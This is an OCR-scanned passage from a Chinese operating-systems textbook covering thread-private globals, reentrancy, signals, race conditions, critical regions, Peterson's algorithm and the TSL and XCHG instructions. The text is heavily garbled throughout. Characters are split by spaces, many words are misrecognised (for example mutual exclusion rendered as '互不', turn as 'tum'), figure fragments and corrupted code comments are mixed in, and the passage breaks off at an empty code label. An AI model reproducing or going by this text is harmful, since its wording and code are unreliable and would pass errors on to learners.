变量 对 一 个 线程 中 所 有 过 程 都 是 可 见 的 。 而 在 原先 的 作用 域 层 里 ， 变 
只 对 一 个 过 程 可 见 ， 并 在 程序 中 处 处 可 见 。 


人 | 


tall 


线程 1 的 代码 
线程 2 的 代码 
线程 1 的 堆栈 


线程 2 的 堆栈 


线程 1 的 全 局 变量 


线程 2 的 全 局 变量 


2-20 ”线程 可 拥有 私有 的 全 局 变量 


访问 私有 的 全 局 变量 需要 有 些 技巧 ， 不 过 ， 多 数 程 序 设 计 语 言 具 
有 表示 局 部 变量 和 全 局 变量 的 方式 ， 而 没有 中 间 的 形式 。 有 可 能 为 全 
局 变量 分 配 一 块 内 存 ， 并 将 它 转送 给 线程 中 的 每 个 过 程 作为 额外 的 参 
数 。 尽 管 这 不 是 一 个 漂亮 的 方案 ， 但 却 是 一 个 可 用 的 方案 。 


还 有 另 一 种 方案 ， 可 以 引入 新 的 库 过 程 ， 以 便 创 建 、 设 置 和 读 取 
这 些 线程 范围 的 全 局 变量 。 首 先 一 个 调用 也 许 是 这 样 的 : 


create_global( "bufptr"); 


该 调用 在 堆 上 或 在 专 | Aa Al ARE OR BAK AK ER 
r 间 。 无 论 该 存储 空间 分 配 在 何 处 ， 只 有 调 
用 线程 才 可 访问 其 全 局 变量 。 如 采 必 一 个 线程 创建 了 同名 的 全 局 变 
， 由 于 它 在 不 同 的 存储 单元 上 ， 所 以 不 会 与 已 有 的 那个 变量 产生 剖 


LER 
里 
突 。 


访问 全 局 变量 需要 两 个 调用 : 一 个 用 于 写 入 全 局 变量 ， 另 一 个 用 
于 读 取 全 局 变量 。 对 于 写 入 ， 类 似 有 


set_global("bufptr", S&buf); 


它 把 指针 的 值 保 存在 移 前 通过 调用 create_global 创 建 的 存储 单元 
中 。 如 有 果 要 读 出 一 个 全 局 变量 ， 调 用 的 形式 类 似 于 


bufptr=read_global("bufptr"); 


这 个 调用 返回 一 个 存储 在 全 局 变量 中 的 地 址 ， 这 样 就 可 以 访问 其 
中 的 数据 了 。 


试图 将 单一 线程 程序 转 为 多 线程 程序 的 另 一 个 问题 症 ， 有 许多 库 
过 程 并 不 是 可 重 入 的 。 也 殊 是 说 ， 它 们 不 古 被 设计 成 下 列 工作 方式 
的 : 对 于 任何 给 定 的 过 程 ， 当 前 面 的 调用 沿 没 有 结束 之 前 ， 可 以 进行 
第 二 次 调用 。 例 如 ， 可 以 将 通过 网 络 发 送 消息 恰当 地 设计 为 ， 在 库 内 
部 的 一 个 固定 缓冲 区 中 进行 消 妃 组 合 ， 然 后 陷入 内 核 将 其 发 送 。 但 
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到 第 二 个 线程 ， 而 第 二 个 线程 立即 用 它 目 己 的 消息 重 写 了 该 缓冲 区 ， 
MBETE? 


类 似 地 还 有 内 存 分 配 过 程 ， 例 如 UNIX 中 的 malloc， 它 维护 着 内 存 
使 用 情况 的 关键 表格 ， 如 可 用 内 存 块 链表 。 在 malloc 忙 于 更 新 表格 
时 ， 有 可 能 暂时 处 于 一 种 不 一 致 的 状态 ， 指 针 的 指 回 不 定 。 如 采 在 表 
格 处 于 一 种 不 一 致 的 状态 时 发 生 了 线程 切换 ， 并 且 从 一 个 不 同 的 线程 
中 来 了 一 个 新 的 调用 ， 融 可 能 会 由 于 使 用 了 一 个 无 效 指针 从 而 导致 程 
序 朋 浇 。 要 有 效 的 解决 所 有 这 些 问 题 意味 着 重 写 整个 库 。 做 这 件 事 并 
非 是 无 效 的 行为 。 
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一 个 二 进 制 位 从 而 标志 某 个 库 处 于 使 用 中 。 在 先前 的 调用 还 没有 完成 
之 前 ， 任 何 试图 使 用 该 库 的 其 他 线程 都 会 被 阻塞 。 尽 管 这 个 方式 可 以 
工作 ,但 古 它 会 极 大 地 降低 系统 潜在 的 并 行 性 。 


接着 考虑 信号 。 有 些 信号 逻辑 上 有 是 线程 专用 的 ， 但 是 另 一 些 却 不 
是 。 例 如 ， 如 果 某 个 线程 调用 alarm， 信 号 送 往 进 行 该 调用 的 线程 是 有 
意义 的 。 但 是 ， 当 线程 完全 在 用 户 空间 实现 时 ， 内 核 根 本 不 知道 有 线 
程 存在 ， 因 此 很 难 将 信号 发 送 给 正确 的 线程 。 如 果 一 个 进程 一 次 仅 有 
一 个 警报 信和 号 等 得 处 理 ， 而 其 中 的 多 个 线程 又 独立 地 调用 alarm， 那 么 
情况 丈 更 加 复杂 了 。 


有 坚信 号 ， 如 键盘 中 断 ， 则 不 是 线 程 专用 的 。 谁 应 该 捕捉 它们 ? 
一 个 指定 的 线程 ? 所 有 的 线程 ? 还 是 新 创建 的 弹出 式 线程 ? 进而 ， 如 
果 某 个 线程 修改 了 信和 号 处 理 程序 ， 而 没有 通知 其 他 线程 ， 会 出 现 什么 
情况 ? 如 果 某 个 线程 想 捕 提 一 个 特定 的 信号 〈 比 如， 用户 击 键 
CTRL+C) ， 而 另 一 个 线程 却 想 用 这 个 信和 号 终止 进程 ， 又 会 发 生 什么 
TUL? 如 采 有 一 个 或 多 个 线程 运行 标准 的 库 过 程 以 及 其 他 用 户 编写 的 
过 程 ， 那 么 情况 还 会 更 复杂 。 很 显然 ， 这 些 想法 是 不 兼容 的 。 一 般 而 
言 ， 在 单线 程 的 环境 中 信和 号 已 经 是 很 难 管理 的 了 ， 到 了 多 线程 环境 中 
并 不 会 使 这 一 情况 变 得 容易 处 理 。 


由 多 线程 引入 的 最 后 一 个 问题 是 堆栈 的 管理 。 在 很 多 系统 中 ， 当 
一 个 进程 的 堆栈 次 出 时 ， 内 核 只 是 目 动 为 该 进程 提供 更 多 的 堆栈 。 当 
一 个 进程 有 多 个 线程 时 ， 束 必须 有 多 个 堆栈 。 如 果 内 核 不 了 解 所 有 的 
堆栈 ， 束 不 能 使 它们 目 动 增长 ， 直 到 造成 堆栈 出 错 。 事 实 上 ， 内 核 有 
可 能 还 没有 意识 到 内 存 错 是 和 某 个 线程 栈 的 增长 有 关系 的 。 


这 些 问题 当然 不 是 不 可 克服 的 ， 但 是 却说 明了 给 已 有 的 系统 引入 
线程 而 不 进行 实质 性 的 重新 设计 系统 是 根本 不 行 的 。 至 少 可 能 需要 重 
新 定义 系统 调用 的 语义 ， 并 且 不 得 不 重 写 库 。 而 且 所 有 这 些 工 作 必须 
与 在 一 个 进程 中 有 一 个 线程 的 原 有 程序 向 后 兼容 。 有 关 线 程 的 其 他 信 
息 ， 可 以 参阅 (Hauser 等 人 ，1993; Marsh 等 人 ，1991) ° 


2.3 进程 间 通 信 


进程 经 党 需要 与 其 他 进程 通信 。 例 如 ， 在 一 个 shell 管 道中 ， 第 一 
个 进程 的 输出 必须 传送 给 第 二 个 进程 ， 这 样 沿 着 管道 传递 下 去 。 因 此 
在 进程 之 间 需 要 通信 ， 而 且 最 好 使 用 一 种 结构 民 好 的 方式 ， 不 要 使 用 
中 断 。 在 下 面 几 市 中， 我 们 就 来 讨论 一 些 有 关 进 程 间 通 信 (nter 


Process Communication, IPC) 的 问题 。 


简要 地 说 ， 有 三 个 问题 。 第 一 个 问题 与 上 面 的 叙述 有 关 ， 即 一 个 
进程 如 何 把 信息 传递 给 另 一 个 。 第 二 个 要 处 理 的 问题 是 ， 确 保 两 个 或 
更 多 的 进程 在 关键 活动 中 不 会 出 现 交 叉 ， 例 如 ， 在 飞机 订 票 系统 中 的 
两 个 进程 为 不 同 的 客户 试图 争夺 飞机 上 的 最 后 一 个 座位 。 第 三 个 问题 
与 正确 的 顺序 有 关 (如 果 该 顺序 是 有 关联 的 话 ) ， 比 如 ， 如 果 进 程 A 
产生 数据 而 进程 B 打 印 数 据 ， 那 么 B 在 打印 之 前 必须 等 待 ， 直 到 A 已 经 
产生 一 些 数 据 。 我 们 将 从 下 一 节 开 始 考察 所 有 这 三 个 问题 。 


有 必要 说 明 ， 这 三 个 问题 中 的 两 个 问题 对 于 线程 来 说 是 同样 适用 
的 。 第 一 个 问题 ( 即 传递 信息 ) 对 线程 而 言 比较 容易 ， 因 为 它们 共享 
一 个 地 址 空间 (在 不 同 地 址 空间 需要 通信 的 线程 属于 不 同 进程 之 间 的 
通信 情形 ) 。 但 是 另外 两 个 问题 (需要 梳理 清楚 并 保持 恰当 的 顺序 ) 
同样 适用 于 线程 。 同 样 的 问题 可 用 同样 的 方法 解决 。 下 面 开 始 讨论 进 


程 间 通信 的 问题 ， 不 过 请 记 住 ， 同 样 的 问题 和 解决 方法 也 适用 于 线 
程 。 


2.3.1 ”竞争 条 件 


在 一 些 操 作 系 统 中 ， 协 作 的 进程 可 能 共 至 一 些 彼 此 都 能 读 写 的 公 
用 存储 区 。 这 个 公用 存储 区 可 能 在 内 存 中 〈 可 能 是 在 内 核 数据 结构 
中 ) ， 也 可 能 是 一 个 共享 文件 。 这 里 共享 存储 区 的 位 置 并 不 影响 通信 
的 本 质 及 其 市 来 的 问题 。 为 了 理解 实际 中 进程 间 通 信和 如 何 工作 ， 我 们 
著 虑 一 个 位 单 但 很 普遍 的 例子 ， 一 个 假 脱 机 打印 程序 。 当 一 个 进程 需 
要 打印 一 个 文件 时 ， 它 将 文件 名 放 在 一 个 特殊 的 假 脱 机 目录 (spooler 
directory) 下 。 男 一 个 进程 (打印 机 守护 进程 ， 则 周期 性 地 检查 是 否 
有 文件 需要 打印 ， 奉 有 束 打 印 并 将 该 文件 名 从 目录 下 删 掉 。 


设想 假 脱 机 目 孙 中 有 许多 槽 位， 编号 依次 为 0，1，2，.…， 每 个 本 
位 存放 一 个 文件 名 。 同 时 假设 有 两 个 共 至 变量 :out， 指 癌 下 一 个 要 打 
印 的 文件 ，in， 指 向 目录 中 下 一 个 空 几 模 位 。 可 以 把 这 两 个 变量 你 存 
在 一 个 所 有 进程 都 能 访问 的 文件 中 ， 该 文件 的 长 度 为 两 个 字 。 在 某 一 
时 刻 ，0 号 至 3 号 槽 位 空 〈 其 中 的 文件 已 经 打印 完毕 ) , 45265 
被 占用 (其 中 存 有 排 好 队列 的 要 打印 的 文件 名 ) 。 几 乎 在 同一 时 刻 ， 
进程 A 和 进程 B 都 决定 将 一 个 文件 排队 打印 ， 这 种 情况 如 图 2-21 所 示 。 


假 脱 机 目录 


图 2-21 两 个 进程 同时 想 访 问 共享 内 存 


在 Murphy 法 则 (任何 可 能 出 错 的 地 方 终 将 出 错 ) 生效 时 ， 可 能 发 
生 以 下 的 情况 。 进 程 A 读 到 in 的 值 为 7， 将 7 存在 一 个 局 部 变量 
next_free_slot 中 。 此 时 发 生 一 次 时 钟 中 断 ，CPU 认 为 进程 A 已 运行 了 足 
够 长 的 时 间 ， 决 定 切 换 到 进程 B。 进 程 B 也 读 取 in， 同 样 得 到 值 为 7， 
于 是 将 7 存在 B 的 局 部 变量 next_free_slot 中 。 在 这 一 时 刻 两 个 进程 都 认 
为 下 一 个 可 用 槽 位 是 7 。 


进程 B 现 在 继续 运行 ， 它 将 其 文件 名 存在 槽 位 7 中 并 将 in 的 值 更 新 
为 8° 然后 它 离开 ， 继 续 执 行 其 他 操作 。 


最 后 进程 A 接 着 从 上 次 中 断 的 地 方 再 次 运行 。 它 检查 变量 
next_free_slot， 发 现 其 值 为 >， 于 是 将 打印 文件 名 存 入 7 号 槽 位 ， 这 样 
号 把 进程 B 存 在 那里 的 文件 名 徐 盖 挥 。 然 后 它 将 next_free_slot 加 1， 得 
到 值 为 8， 束 将 8 存 到 in 中 。 此 时 ， 假 脱 机 目录 内 部 十 一 致 的 ， 所 以 打 
印 机 守护 进程 发 现 不 了 任何 错误 ， 但 进程 B 却 永远 得 不 到 任何 打印 输 
出 。 类 似 这 样 的 情况 ， 即 两 个 或 多 个 进程 读 写 菏 些 共 至 数据 ， 而 最 后 
的 结果 取决 于 进程 运行 的 精确 时 序 ， 称 为 竞争 条 件 (race 
condition) 。 调 试 包 含有 竞争 条 件 的 程序 是 一 件 很 头痛 的 事 。 大 多 数 
的 测试 运行 结果 都 很 好 ， 但 在 极 少数 情况 下 会 发 生 一 些 无 法 解释 的 柯 
怪 现 象 。 


2.3.2 ”临界 区 


怎样 避免 竞争 条 件 ? 实际 上 凡 涉 及 共享 内 存 、 共 享 文件 以 及 共享 
任何 货源 的 情况 都 会 引发 与 前 面 类 似 的 错误 ， 要 避免 这 种 铺 误 ， 天 键 
是 要 找 出 某 种 途径 来 阻止 多 个 进程 同时 读 写 共 享 的 数据 。 换 言 之 ， 我 
们 和 需要 的 是 互 不 (mutual exclusion) ， 即 以 某 种 手段 确保 当 一 个 进程 在 
使 用 一 个 共享 变量 或 文件 时 ， 其 他 进程 不 能 做 同样 的 操作 。 前 述 问题 
的 症结 就 在 于 ， 在 进程 A 对 共 吝 变量 的 使 用 未 结束 之 前 进程 B 就 使 用 
它 。 为 实现 互 不 而 选择 适当 的 原 语 是 任何 操作 系统 的 主要 设计 内 容 之 
一 ， 也 是 我 们 在 后 面 几 节 中 要 详细 讨论 的 主题 。 


避免 竞争 条 件 的 问题 也 可 以 用 一 种 抽象 的 方式 进行 描述 。 一 个 
程 的 一 部 分 时 间 做 内 部 计算 或 另外 一 些 不 会 引发 竞争 条 件 的 操作 。 
某 些 时 候 进 程 可 能 需要 访问 共享 内 存 或 共享 文件 ， 或 执行 另外 一 些 
导致 竞争 的 操作 。 我 们 把 对 共享 内 存 进行 访问 的 程序 片段 称 作 临 界 区 
Ja (critical region) 或 临界 区 (critical section) 。 如 果 我 们 能 够 适当 地 
安排 使 得 两 个 进程 不 可 能 同时 处 于 临界 区 中 ， 就 能 够 避免 苋 争 条 
们 


进 
在 
A 
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尽管 这 样 的 要 求 避免 了 竞争 条 件 ， 但 它 还 不 能 保证 使 用 共享 数据 
的 并 发 进程 能 够 正确 和 高 效 地 进行 协作 。 对 于 一 个 好 的 解决 方案 ， 需 
要 满足 以 下 4 个 条 件 : 


1) 任 何 两 个 进程 不 能 同时 处 于 其 临界 区 。 
2) 不 应 对 CPU 的 速度 和 数量 做 任何 假设 。 
3) 临 弄 区 外 运行 的 进程 不 得 阻塞 其 他 进程 。 
4) 不 得 使 进程 无 限期 等 待 进入 临界 区 。 


从 抽象 的 角度 看 ， 我 们 所 希望 的 进程 行为 如 图 2-22 所 示 。 图 2-22 中 
进程 A 在 Ti 时 刻 进入 临界 区 。 稍 后 ， 在 T 时 刻 进程 B 试 图 进入 临界 区 ， 
但 是 失败 了 ， 因 为 另 一 个 进程 已 经 在 该 临 弄 区 内 ， 而 一 个 时 刻 只 允许 
一 个 进程 在 临界 区 内 。 随 后 ，B 被 暂时 挂 起 直到 Ts 时 刻 A 离 开 临 界 区 为 
止 ， 从 而 允许 B 立 即 进 入 。 最 后 ，B 离 开 (在 时 刻 T4 ) ， 回 到 了 在 临界 
区 中 没有 进程 的 原始 状态 。 


A 进入 临界 区 


/ / A 离开 临界 区 
进程 A 
| l | 
1 B 试 图 进入 | | 
临界 区 ，B 进 入 临界 区 ，。 B 离 开 临 界 区 
| | 
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图 2-22 使 用 临界 区 的 互 不 


2.3.3 ”人 忙 等 竺 的 互 斥 


本 闻 将 讨论 几 种 实现 互 斥 的 方案 。 在 这 些 方案 中 ， 当 一 个 进程 在 
临界 区 中 更 新 共 至 内 存 时 ， 其 他 进程 将 不 会 进入 其 临界 区 ， 也 不 会 带 
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后 ， 时 钟 中 断 也 被 屏蔽 。CPU 只 有 发 生 时 钟 中 断 或 其 他 中 断 时 才 会 进 
行进 程 切换 ， 这 样 ， 在 屏蔽 中 断 之 后 CPU 将 不 会 被 切换 到 其 他 进程 。 
于 是 ,一 旦 某 个 进程 屏蔽 中 断 之 后 ， 它 就 可 以 检查 和 修改 共享 内 存 ， 
而 不 必 担 心 其 他 进程 介入 


这 个 方案 并 不 好 ， 因 为 把 屏蔽 中 断 的 权力 交 给 用 户 进程 是 不 明智 
的 。 设 想 一 下 ， 奉 一 个 进程 屏蔽 中 断后 不 再 打开 中 断 ， 其 结 末 将 会 如 
何 ? 整个 系统 可 能 会 因此 终止 。 而 且 ， 如 采 系 统 是 多 处 理 器 (有 两 个 
或 可 能 更 多 的 处 理 器 ) ， 则 屏蔽 中 断 仅仅 对 执行 disable 指 令 的 那个 CPU 
有 效 。 其 他 CPU 仍 将 继续 运行 ， 并 可 以 访问 共享 内 存 。 


一 方面 ， 对 内 核 来 说 ， 当 它 在 更 新 变量 或 列表 的 几 条 指令 期 间 
将 中 断 屏 蔽 是 很 方便 的 。 当 驶 绻 进程 队列 之 类 的 数据 状态 不 一 致 时 发 


生 中 断 ， 则 将 导致 竞争 条 件 。 所 以 结论 是 : 屏蔽 中 断 对 于 操作 系统 
号 而 言 是 一 项 很 有 用 的 技术 ， 但 对 于 用 户 进程 则 不 是 一 种 合适 的 通用 
互 不 机 制 。 


由 于 多 核 必 片 的 数量 越 来 越 多 ， 即 使 在 低 端 PC 上 也 是 如 此 。 
此 ， 通 过 屏蔽 中 断 来 达到 互 斥 的 可 能 性 一 一 甚至 在 内 核 中 一 一 变 得 日 
益 减 少 了 。 双 核 现在 已 经 相当 普遍 ， 四 核 当前 在 高 端 机 器 中 存在 ， 而 
且 我 们 离 八 或 十 六 ( 核 ) 也 不 久远 了 。 在 一 个 多 核 系 统 中 〈 例 如 ， 多 
处 理 器 系统 ) ， 屏 蔽 一 个 CPU 的 中 断 不 会 阻止 其 他 CPU 干预 第 一 个 CPU 
所 做 的 操作 。 结 果 是 人 们 需要 更 加 复杂 的 计划 。 


2. 锁 变量 


作为 第 二 种 尝试 ， 可 以 寻找 一 种 软件 解决 方案 。 设 想 有 一 个 共享 
(il) 变量 ， 其 初始 值 为 0。 当 一 个 进程 想 进入 其 临界 区 时 ， 它 首先 测 
试 这 把 锁 。 如 果 该 锁 的 值 为 0， 则 该 进程 将 其 设置 为 1 并 进入 临界 区 。 
大 这 把 锁 的 值 已 经 为 1， 则 该 进程 将 等 竺 直到 其 值 变 为 0。 于 是 ，0 束 表 
示 临 办 区 内 没有 进程 ，1 表 示 已 经 有 某 个 进程 进入 临界 区 。 


但 生 ， 这 种 想法 也 包含 了 与 假 脱 机 目录 一 样 的 芷 漏 。 假 设 一 个 进 
程 读 出 锁 要 量 的 值 并 发 现 它 为 0， 而 恰好 在 它 将 其 值 设置 为 1 之 前 ， 改 
一 个 进程 被 调度 运行 ， 将 该 锁 变 量 设置 为 1。 当 第 一 个 进程 再 次 能 运行 
时 ， 它 同样 也 将 该 锁 设置 为 7， 则 此 时 同时 有 两 个 进程 进入 临界 区 中 。 


可 能 读者 会 想 ， 先 读 出 锁 变 量 ， 紧 接着 在 改变 其 值 之 前 再 检查 一 
志 它 的 值 ， 这 样 便 可 以 解决 问题 。 但 这 实际 上 无 济 于 事 ， 如 有 果 第 二 个 
进程 恰好 在 第 一 个 进程 完成 第 二 次 检查 之 后 修改 了 锁 变 量 的 值 ， 则 同 


3. 广 格 轮换 法 


第 三 种 互 斥 的 方法 如 图 2-23 所 示 。 几 乎 与 本 书 中 所 有 其 他 程序 一 
样 ， 这 里 的 程序 段 用 C 语 言 编 写 。 之 所 以 选择 C 语 言 是 由 于 实际 的 操作 
系统 普遍 用 C 语 言 编写 (或 偶尔 用 C++) ， 而 基本 上 不 用 像 Java、 
Modula3 或 Pascal 这 样 的 语言 。 对 于 编写 操作 系统 而 言 ，C 语 言 是 强大 、 
有 效 、 可 预知 和 有 特性 的 语言 。 而 对 于 Java， 它 就 不 是 可 预知 的 ， 因 为 
它 在 关键 时 刻 会 用 完 存储 器 ， 而 在 不 合适 的 时 候 会 调用 垃圾 收集 程序 
回收 内 存 。 在 C 语 言 中 ， 这 种 情形 就 不 可 能 发 生 ， 因 为 C 语 言 中 不 需要 
进行 空间 回收 。 有 关 C、C++、Java 和 其 他 四 种 语言 的 定量 比较 可 参阅 

(Prechelt, 2000) 。 


SN 


在 图 2-23 中 ， 整 型 变量 tum， 初 始 值 为 0%， 用 于 记录 轮 到 哪个 进程 
进入 临界 区 ， 并 检查 或 更 新 共享 内 存 。 开 始 时 ， 进 程 0 检查 tum， 发 现 
其 值 为 0， 于 是 进入 临界 区 。 进 程 1 也 发 现 其 值 为 0， 所 以 在 一 个 等 待 特 
环 中 不 停 地 测试 Wm， 看 其 值 何 时 变 为 1。 连续 测试 一 个 变量 直到 某 个 
值 出 现 为 止 ， 称 为 忙 等 待 (busy waiting) 。 由 于 这 种 方式 浪费 CPU 时 
间 ， 所 以 通 第 应 该 避免 。 


while (TRUE) { while (TRUE) { i 
while (turn != 0) /* 循环 */ while (turn != 1) /* Vi */ 
critical_region( ); critical_region( ); 


turn = 1; turn = 0; 
noncritical_region( ); noncritical_region( ); 


} 
a) b) 


图 2-23 临界 区 问题 的 一 种 解法 (在 两 种 情况 下 请 注意 分 号 终止 了 
while 语 句 ) : a) 进 程 0，b) 进 程 1 


只 有 在 有 理由 认为 等 待 时 间 是 非常 短 的 情形 下 ， 才 使 用 忙 等 竺 。 
用 于 忙 等 竺 的 锁 ， 称 为 目 旋 锁 (spin lock) 。 


进程 0 离开 临界 区 时 ， 它 将 tum 的 值 设 置 为 1， 以 便 允 许 进程 1 进入 
其 临界 区 。 假 设 进程 1 很 快 便 离 开 了 临界 区 ， 则 此 时 两 个 进程 都 处 于 临 
界 区 之 外 ，turn 的 值 又 被 设置 为 0。 现在 进程 0 很 快 就 执行 完 其 整个 循 
环 ， 它 退出 临界 区 ， 并 将 turn 的 值 设置 为 1° 此 时 ，tum 的 值 为 1， 两 个 
进程 都 在 其 临界 区 外 执行 。 


突然 ， 进 程 0 结束 了 非 临 界 区 的 操作 并 且 返 回 到 循环 的 开始 。 但 
是 ， 这 时 它 不 能 进入 临界 区 ， 因 为 tm 的 当前 值 为 1， 而 此 时 进程 1 还 在 
忙于 非 临 界 区 的 操作 ， 进 程 0 只 有 继续 while 循 环 ， 直 到 进程 1 把 tum 的 值 
改 为 0° 这 说 明 ， 在 一 个 进程 比 男 一 个 慢 了 很 多 的 情况 下 ， 轮 流 进 入 临 
界 区 并 不 古 一 个 好 办 法 。 


这 种 情况 违反 了 前 面 叙 述 的 条 件 3: 进程 0 被 一 个 临界 区 之 外 的 进 
程 阻塞 。 再 回 到 前 面 假 脱 机 目录 的 问题 ， 如 采 我 们 现在 将 临界 区 与 读 
写 假 脱 机 目录 相 联 系 ， 则 进程 0O 有 可 能 因为 进程 1 在 做 其 他 事情 而 被 蔡 
EH 


实际 上 ， 该 方案 要 求 两 个 进程 产 格 地 轮流 进入 它们 的 临界 区 ， 如 
假 脱 机 文件 等 。 任 何 一 个 进程 都 不 可 能 在 一 轮 中 打印 两 个 文件 。 尺 管 
该 算法 的 确 避 人 免 了 所 有 的 竞争 条 件 ， 但 由 于 它 违 反 了 条 件 3， 所 以 不 能 
作为 一 个 很 好 的 备 选 方案 。 


4.Peterson 解 法 


傈 兰 数学 家 T.Dekker 通 过 将 锁 变 量 与 警告 变量 的 思想 相 结 合 ， 最 早 
提出 了 一 个 不 需要 严格 轮换 的 软件 互 不 算法 。 关 于 Dekker 的 算法 ， 请 
参阅 (Dijkstra, 1965) ° 


1981 年 ，G.L.Peterson 发 现 了 一 种 简单 得 多 的 互 不 算法 ， 这 使 得 
Dekker 的 方法 不 再 有 任何 新 意 。Peterson 的 算法 如 图 2-24 所 示 。 该 算法 
由 两 个 用 ANSI C 编 写 的 过 程 组 成 。ANSI C 要 求 为 所 定义 和 使 用 的 所 有 
函数 提供 函数 原型 。 不 过 ， 为 了 闻 省 篇 幅 ， 在 这 里 和 后 续 的 例子 中 我 
们 将 不 给 出 函数 原型 。 


#define FALSE 0 

#define TRUE 1 es 

#define N 2 /# 进程 数量 */ 

int turn; /* SALE BYE? */ 

int interested[N]; /* 所 有 值 初始 化 为 0 (FALSE) */ 


void enter_region(int process); /* 进程 是 0 或 1 */ 


int other; * 其 他 进程 号 */ 


other = 1 — process; * - 方 进程 */ 

interested[process] = TRUE; : ET 所 感 兴趣 的 */ 

turn = process; * 设置 标志 */ 

while (turn == process && interested[other] == TRUE); /* i54] */ 
} 


void leave_region(int process) /* PERE: 谁 离开 ? */ 


interested[process] = FALSE; /x* 表示 离开 临界 区 */ 


Al 2-24 完成 互 不 的 Peterson 解 法 


在 使 用 共享 变量 ( 即 进 入 其 临界 区 ) 之 前 ， 各 个 进程 使 用 其 进程 
号 0 或 1 作为 参数 来 调用 enter_region。 该 调用 在 需要 时 将 使 进程 等 待 ， 
直到 能 安全 地 进入 临界 区 。 在 完成 对 共享 变量 的 操作 之 后 ， 进 程 将 诺 
用 leave_region， 表 示 操 作 已 完成 ， 奉 其 他 的 进程 希望 进入 临界 区 ， 则 
现在 束 可 以 进入 


现在 来 看 看 这 个 方案 是 如 何 工 作 的 。 一 开始 ， 没 有 任何 进程 处 于 
临界 区 中 ， 现 在 进程 0 调用 enter_region。 它 通过 设置 其 数组 元 素 和 将 
tum 置 为 0 来 标识 它 和 希望 进入 临界 区 。 由 于 进程 1 并 不 想 进入 临界 区 ， 所 
以 enter_region 很 快 便 返 回 。 如 有 果 进 程 1 现在 调用 enter_region， 进 程 1 将 


在 此 处 挂 起 直到 interested[0] 变 成 FALSE， 该 事件 只 有 在 进程 0 调用 
leave_region 退 出 临界 区 时 才 会 发 生 。 


现在 考虑 两 个 进程 几乎 同时 调用 enter_region 的 情况 。 它 们 都 将 目 
己 的 进程 号 存 入 tum， 但 只 有 后 被 保存 进去 的 进程 号 才 有 效 ， 前 一 个 因 
被 重 写 而 丢失 。 假 设 进程 1 是 后 存 入 的 ， 则 tum 为 1。 当 两 个 进程 都 运行 
到 while 语 句 时 ， 进 程 0 将 循环 0 次 并 进入 临界 区 ， 而 进程 1 则 将 不 停 地 循 
环 且 不 能 进入 临界 区 ， 直 到 进程 0 退出 临界 区 为 止 。 


5.TSL 指 令 


现在 来 看 需要 硬件 支持 的 一 种 方案 。 某 些 计 算 机 中 ， 特 别 是 那些 
设计 为 多 处 理 天 的 计算 机 ， 都 有 下 面 一 条 指令 : 


TSL RX, LOCK 


称 为 测试 并 加 锁 (Test and Set Lock) ， 它 将 一 个 内 存 字 lock 读 到 
寄存 器 RX 中 ， 然 后 在 该 内 存 地 址 上 存 一 个 非 零 值 。 读 字 和 写字 操作 保 
证 是 不 可 分 割 的 ， 即 该 指令 结束 之 前 其 他 处 理 器 均 不 允许 访问 该 内 存 
字 。 执 行 TSL 指 令 的 CPU 将 锁 住 内 存 总 线 ， 以 禁止 其 他 CPU 在 本 指令 结 
束 之 前 访问 内 存 。 


痢 重 说 明 一 下 ， 锁 住 存 储 总 线 不 同 于 屏 贡 中断。 屏 散 中断， 然后 
在 读 内 存 字 之 后 跟 痢 写 操作 并 不 能 阻止 总 线 上 的 第 二 个 处 理 硕 在 读 操 


作 和 和 写 操作 之 间 访 问 该 内 存 字 。 事 实 上 ， 在 处 理 禹 1 上 屏蔽 中 断 对 处 理 
志 2 根 本 没有 任何 影响 。 让 处 理 夯 2 远离 内 存 直 到 处 理 夯 1 完成 的 惟一 方 
法 就 是 锁 住 总 线 ， 这 需要 一 个 特殊 的 硬件 设施 “基本 上 ， 一 根 总 线 就 
可 以 确保 总 线 由 锁 住 它 的 处 理 器 使 用 ， 而 其 他 的 处 理 器 不 能 用 ) 。 


为 了 使 用 TSL 指 令 ， 要 使 用 一 个 共享 变量 lock 来 协调 对 共享 内 存 的 
访问 。 当 lock 为 0 时 ， 任 何 进程 都 可 以 使 用 TSL 指 令 将 其 设置 为 1， 并 读 
写 共 部 内存。 当 操 作 结束 时 ， 进 程 用 一 条 普通 的 move 指 令 将 lock 的 值 
重新 设置 为 0。 


这 条 指令 如 何 防 止 两 个 进程 同时 进入 临界 区 呢 ? 解决 方案 如 图 2-25 
所 示 。 假 定 (但 很 典型 ， 存 在 如 下 共 4 条 指令 的 汇编 语言 子 程序 。 第 一 
条 指令 将 lock 原 来 的 值 复制 到 寄存 右 中 并 将 lock 设 置 为 1， 随 后 这 个 原 
来 的 值 气 0 相 比较 。 如 果 它 非 零 ， 则 说 明 以 前 已 被 加 锁 ， 则 程序 将 回 到 
开始 并 再 次 测试 。 经 过 或 长 或 短 的 一 段 时 间 后 ， 该 值 将 变 为 0 (当前 处 
于 临界 区 中 的 进程 退出 临界 区 时 ) ， 于 是 过 程 返回 ， 此 时 已 加 锁 。 要 
清除 这 个 锁 非 党 简单 ， 程 序 只 需 将 0 存 入 lock 即 可 ， 不 需要 特殊 的 同步 


指令 。 


enter_region: 
TSL REGISTER,LOCK | 复制 锁 到 寄存 器 并 将 锁 设 为 1 


CMP REGISTER,#0 | 锁 是 零 吗 ? 
JNE enter_region | 若 不 是 零 ， 说 明 锁 已 被 设置 ， 所 以 循环 
RET 


| 返回 调用 者 ， 进 入 了 临界 区 


leave_region: 
MOVE LOCK,#0 | 在 锁 中 存 入 0 
RET | 返回 调用 者 


Al 2-25 用 TSL 指 令 进 入 和 离开 临界 区 


现在 有 一 种 很 明确 的 解法 了 。 进 程 在 进入 临界 区 之 前 先 调用 
enter_region， 这 将 导致 忙 等 待 ， 直 到 锁 空 闻 为 止 ， 随 后 它 获 得 该 锁 并 
返回 。 在 进程 从 临界 区 返回 时 它 调用 leave_region， 这 将 把 lock 设 置 为 
0 。 与 基于 临界 区 问题 的 所 有 解法 一 样 ， 进 程 必须 在 正确 的 时 间 调 用 
enter_region 和 leave_region， 解 法 才能 奏效 。 如 果 一 个 进程 有 欺诈 行 
为 ， 则 互 不 将 会 失败 。 


一 个 可 替代 TSL 的 指令 是 XCHG ， 它 原子 性 地 交换 了 两 个 位 置 的 内 
容 ， 例 如 ， 一 个 寄存 万 与 一 个 存储 瑚 字 。 人 代码 如 图 2-26 所 示 ， 而 且 殉 像 
可 以 看 到 的 那样 ， 它 本 质 上 与 TSL 的 解决 办 法 一 样 。 所 有 的 Intel x86 
CPU 在 低层 同步 中 使 用 XCHG 指 令 。 


enter_region: 
